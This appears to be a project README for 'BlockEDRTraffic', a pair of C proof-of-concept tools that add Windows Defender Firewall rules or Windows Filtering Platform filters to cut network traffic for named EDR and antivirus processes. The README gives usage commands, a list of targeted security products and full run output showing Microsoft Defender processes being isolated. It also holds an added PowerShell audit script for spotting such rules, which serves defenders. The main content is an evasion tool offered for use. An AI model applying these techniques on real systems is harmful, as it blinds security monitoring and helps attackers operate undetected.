BlockEDRTraffic
Two tools written in C that block network traffic for blacklisted EDR processes, using either Windows Defender Firewall (WDF) or Windows Filtering Platform (WFP).
Blocking EDR traffic
Overview
- WindowsDefenderFirewall.exe
  - Creates inbound and outbound block rules in Windows Defender Firewall for blacklisted EDR processes.
- WindowsFilteringPlatform.exe
  - Creates WFP filters that block traffic for blacklisted EDR processes. Includes a custom AppID resolution routine to obtain executable identities.
- Both tools:
  - Verify the process is running with High Integrity and SeDebugPrivilege enabled.
  - Enumerate running processes and match them against a blacklist.
  - Support a cleanup mode that removes only the rules/filters created by these PoCs.
  - These tools do not disable or tamper with security products; they create network block rules/filters referencing targeted executables.
How it works (high level)
- Privilege checks: Ensures elevated integrity level and SeDebugPrivilege to enumerate processes and configure firewall/WFP.
- Process discovery: Enumerates running processes and resolves full image paths for blacklist matching.
- Blocking:
  - WDF: Adds per-app inbound/outbound block rules via the Windows Firewall COM API.
  - WFP: Adds per-app IPv4/IPv6 block filters via the WFP engine.
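Both mechanisms leave auditable artifacts behind: a per-application block rule in Windows Defender Firewall, and a WFP filter carrying an ALE App-ID condition for the executable (the example output further down shows these filters under the name "Default Outbound Block"). The following audit script is an added example for defenders and is not part of this project; it assumes the NetSecurity module and netsh are available, that the netsh XML dump uses the filters/item/displayData layout with an asString element on App-ID conditions, and it uses the Defender process names from this page's example output as its watch list.

```powershell
# Added audit example (not part of the BlockEDRTraffic project): surfaces firewall
# block rules and WFP filters that reference security-product executables.
# Watch list taken from this page's example output; extend it with your own EDR binaries.
$watchList = @('MsMpEng.exe', 'NisSrv.exe', 'MpDefenderCoreService.exe')
$pattern   = ($watchList | ForEach-Object { [regex]::Escape($_) }) -join '|'

# 1) Windows Defender Firewall: enabled per-application block rules.
Write-Host "[i] Firewall block rules referencing watch-listed executables"
Get-NetFirewallRule -Action Block -Enabled True | ForEach-Object {
    $rule = $_
    $app  = $rule | Get-NetFirewallApplicationFilter
    if ($app.Program -and $app.Program -match $pattern) {
        [pscustomobject]@{
            Rule      = $rule.DisplayName
            Direction = $rule.Direction
            Program   = $app.Program
        }
    }
} | Format-Table -AutoSize

# 2) Windows Filtering Platform: dump the filter set to XML and look for the custom
#    filter name shown in this page's cleanup output and for App-ID conditions that
#    point at watch-listed binaries. XML element names are an assumption about the
#    netsh dump format; adjust them if your dump differs.
$dump = Join-Path $env:TEMP 'wfp-filters.xml'
netsh wfp show filters file="$dump" | Out-Null
[xml]$wfp = Get-Content -Path $dump -Raw
Write-Host "[i] WFP filters named 'Default Outbound Block' or matching watch-listed executables"
foreach ($f in $wfp.filters.item) {
    $name  = $f.displayData.name
    # App-ID conditions carry the NT device path of the executable (e.g. \device\harddiskvolume3\...)
    $apps  = @($f.filterCondition.item |
              Where-Object { $_.fieldKey -eq 'FWPM_CONDITION_ALE_APP_ID' } |
              ForEach-Object { $_.conditionValue.byteBlob.asString })
    if ($name -eq 'Default Outbound Block' -or (($apps -join ' ') -match $pattern)) {
        [pscustomobject]@{
            FilterId = $f.filterId
            Name     = $name
            Layer    = $f.layerKey
            AppId    = ($apps -join ', ')
        }
    }
}
Remove-Item -Path $dump -ErrorAction SilentlyContinue
```

Run it from an elevated PowerShell session, since enumerating WFP filters requires administrative rights; any hit on a security product's binary should be treated as a finding and correlated with the process that created the rule or filter.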
Supported EDRs
Currently supported EDRs and their processes include:
- Microsoft Defender Antivirus
- Microsoft Defender for Endpoint
- Elastic EDR
- BitDefender
- Cortex
- CrowdStrike
- Sentinel
- Sophos
Will add more when I get to test them. The process definitions are listed in process.c, making it easy to extend the blacklist with new entries. I haven't fully validated blocking of telemetry being sent towards the SIEM/Dashboard, but I did confirm process names from installed components.
Usage
- Compile it using Visual Studio 2022
WindowsDefenderFirewall.exe
- Use the -e parameter to block all EDR processes
PS C:\ > .\WindowsDefenderFirewall.exe
Usage: WindowsDefenderFirewall.exe -e / -d
Options:
-e Enable - Block blacklisted EDR processes
-d Disable - Remove blocked firewall rules created by this tool
-h - Display this help message
WindowsFilteringPlatform.exe
- Use the --edr parameter to block all EDR processes
- Use the -e parameter to block a specific process
PS C:\ > .\WindowsFilteringPlatform.exe
Usage: WindowsFilteringPlatform.exe -e / -d / --edr
Options:
--edr - Block traffic of blacklisted EDR processes
-e <PROCESS> - Block traffic of specified process
-d - Remove blocked firewall rules created by this tool
-h - Display this help message
Common scenarios
- Block all blacklisted EDR processes (WFP):
PS C:\> .\WindowsFilteringPlatform.exe --edr
- Block a single process (WFP):
PS C:\> .\WindowsFilteringPlatform.exe -e MsMpEng.exe
- Remove created rules/filters:
PS C:\> .\WindowsFilteringPlatform.exe -d
PS C:\> .\WindowsDefenderFirewall.exe -d
Example
PS C:\ > .\WindowsFilteringPlatform.exe --edr
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
OpenProcessToken - Retrieved handle to token 0x00000000000000AC
GetTokenInformation1 - Retrieved 28 bytes of token information
malloc - Allocated 28 bytes of memory at 0x0000026F0B871D60
GetTokenInformation2 - Retrieved 28 bytes of token information at 0x0000026F0B871D60
GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity
[i] BlockEDRTraffic - Blocking traffic of listed processes using Windows Filtering Platform
GetModuleHandleW - Received handle to ntdll.dll 0x00007FFBCB420000
GetProcAddress - Received address to NtQuerySystemInformation 0x00007FFBCB582F60
NtQuerySystemInformation - Retrieved size in bytes for the system information: 292232
HeapAlloc - Allocated 292232 bytes of memory for SystemProcessInformation at 0x0000026F0B879400
NtQuerySystemInformation - Retrieved size in bytes of system information: 292232 at 0x0000026F0B879400
HeapAlloc - Allocated 72 bytes of memory for the EDR process struct at 0x0000026F0B86ECC0
OpenProcess - Opened handle to process "MpDefenderCoreService.exe" 0x00000000000000AC
QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpDefenderCoreService.exe"
OpenProcess - Opened handle to process "MsMpEng.exe" 0x00000000000000AC
QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MsMpEng.exe"
OpenProcess - Opened handle to process "NisSrv.exe" 0x00000000000000AC
QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\NisSrv.exe"
EnumerateEDRProcesses - 3 EDR processes enumerated
Matched EDR process: "MpDefenderCoreService.exe" with PID 4288 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\mpdefendercoreservice.exe"
Matched EDR process: "MsMpEng.exe" with PID 4332 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\msmpeng.exe"
Matched EDR process: "NisSrv.exe" with PID 9808 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\nissrv.exe"
[i] BlockTraffic - Looping through EDR processes and creating Windows Filtering Platform filters
FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A140
FwpmProviderEnum0 - Enumerated 15 objects
FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
FwpmFilterAdd0 - Added IPV4 filter for "MpDefenderCoreService.exe" with ID 77392
FwpmFilterAdd0 - Added IPV6 filter for "MpDefenderCoreService.exe" with ID 77393
FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A230
FwpmProviderEnum0 - Enumerated 15 objects
FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
FwpmFilterAdd0 - Added IPV4 filter for "MsMpEng.exe" with ID 77394
FwpmFilterAdd0 - Added IPV6 filter for "MsMpEng.exe" with ID 77395
FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B879ED0
FwpmProviderEnum0 - Enumerated 15 objects
FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
FwpmFilterAdd0 - Added IPV4 filter for "NisSrv.exe" with ID 77396
FwpmFilterAdd0 - Added IPV6 filter for "NisSrv.exe" with ID 77397
[+] BlockEDRTraffic - Windows Filtering Platform blocking filters for all processes have been created
PS C:\ > .\WindowsFilteringPlatform.exe -d
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
OpenProcessToken - Retrieved handle to token 0x00000000000000E0
GetTokenInformation1 - Retrieved 28 bytes of token information
malloc - Allocated 28 bytes of memory at 0x00000206BD931BB0
GetTokenInformation2 - Retrieved 28 bytes of token information at 0x00000206BD931BB0
GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity
[i] UnblockTraffic - Removing all Windows Filtering Platform rules with custom filter name "Default Outbound Block"
FwpmEngineOpen0 - Opened handle to WFP engine 0x00000206BD93A470
FwpmFilterCreateEnumHandle0 - Opened handle to enumerate filters 0x00000206BD939E90
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77397
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77394
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77393
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77392
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77396
FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77395
[+] UnblockTraffic - Windows Filtering Platform filters have been removed
Credits
I got inspired to expand upon the tools provided in the Evasion Lab (CETP from Altered Security), taught by Saad Ahla.
The EDRSilencer project.
Feature ideas
- Block a specific executable on disk (Not process)
- Block all executables in a specific directory
- Block a specific IP-address or URL (Is wildcard possible?)
- Block a list of IP-addresses or URLs
- Remotely apply WFP Filters?